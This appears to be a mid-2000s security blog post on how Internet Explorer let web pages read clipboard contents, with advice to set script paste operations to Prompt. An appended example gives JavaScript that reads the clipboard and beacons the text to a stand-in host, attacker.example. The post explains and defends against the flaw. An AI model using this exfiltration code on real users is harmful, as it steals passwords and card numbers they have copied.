SD3 + C violation

It seems to me a clear violation of the (SD3 + C) principle: Secure by Design, Secure by Default, Secure in Deployment, and Communications. The scary thing was, I could even reproduce it in IE 7.0 beta; not a Firefox vulnerability of course (not that I'm a Firefox fan, but people!).


Next time you have your CC number, SSN or BoA password in your clipboard, please don't be browsing "those" sites.


Be careful with Ctrl-C

Via Stefan Goßner:


[From a mail thread]


Data stored in the clipboard can be accessed by a malicious website through a combination of JavaScript and server-side code (like ASP, ASP.NET, PHP, CGI, ...).
Just try this:
Copy any text with Ctrl+C.
Click the link: http://www.friendlycanadian.com/applications/clipboard.htm
You will see the text you copied on the screen, which was accessed by this web page.
A malicious website can easily steal sensitive data (like passwords, credit card numbers, PINs etc.) stored in your clipboard while you are surfing the web. To prevent this you should change the security setting "Allow paste operations via script" for at least the Internet Zone in Internet Explorer to Prompt. By default this setting is set to Enabled.
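The following is an added example, not code from the blog, the mail thread, or the linked demo page. It shows what the mail describes: in IE 5-7 a page's script could read the clipboard through the proprietary window.clipboardData object and hand the text to a server, which is exactly what the "Allow paste operations via script" setting controls. The window objects, the collector URL and the behaviour of getData after the setting is changed to Prompt/Disable (assumed here to surface as an empty or null return) are assumptions so the logic runs outside a browser.

```javascript
// Added example (not from the original post). Reproduces the IE-era clipboard theft
// technique against constructed window stand-ins so it runs under Node.

// Read the clipboard the way a malicious page in old IE would. Returns the text, or null
// when the browser has no such API (Firefox and others never exposed clipboardData to
// pages) or when IE's "Allow paste operations via script" setting blocks the read or the
// user declines the prompt (assumed here to come back as an empty/null getData result).
function readClipboardViaScript(win) {
  var cd = win && win.clipboardData;
  if (!cd || typeof cd.getData !== "function") {
    return null;
  }
  var text = cd.getData("Text");
  return text ? String(text) : null;
}

// Build the URL a page would request to exfiltrate what it read; the server side
// (ASP, PHP, CGI, ...) only has to log the query string.
function buildExfilUrl(collectorUrl, text) {
  return collectorUrl + "?clip=" + encodeURIComponent(text);
}

// Full attack flow: read the clipboard and, if anything came back, fire a beacon request
// through an Image object (no XHR needed, and it works cross-origin). Returns the URL that
// was requested, or null when nothing could be read.
function stealClipboard(win, collectorUrl) {
  var text = readClipboardViaScript(win);
  if (text === null) {
    return null;
  }
  var url = buildExfilUrl(collectorUrl, text);
  if (typeof win.Image === "function") {
    var img = new win.Image();
    img.src = url; // the request itself leaks the data to the collector
  }
  return url;
}

// Constructed stand-ins (assumptions, not real browser objects):
// 1. IE with the setting at its default "Enable": getData returns whatever was last copied.
var ieDefault = {
  clipboardData: { getData: function (fmt) { return fmt === "Text" ? "P@ssw0rd" : null; } },
  Image: function () { this.src = ""; }
};
// 2. IE after the setting is changed to Prompt/Disable and the user declines: nothing comes back.
var ieLocked = {
  clipboardData: { getData: function () { return null; } },
  Image: function () { this.src = ""; }
};
// 3. A browser that never exposed the proprietary API at all.
var nonIe = { Image: function () { this.src = ""; } };

var collector = "http://attacker.example/collect.php"; // hypothetical collector endpoint
```

Run with Node: `stealClipboard(ieDefault, collector)` returns the beacon URL carrying the clipboard text, while the locked-down IE and non-IE stand-ins return null. Note that the page itself cannot defend the user here; only the browser setting (Prompt or Disable) does, which is why the mail recommends changing it for the Internet Zone. Modern browsers replaced this with navigator.clipboard.readText(), which requires a user gesture and, for reads, an explicit permission, so the silent version of this attack no longer works in current browsers.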


More on Thinking About Security: Secure by Design, Secure by Default, Secure in Deployment and Communications
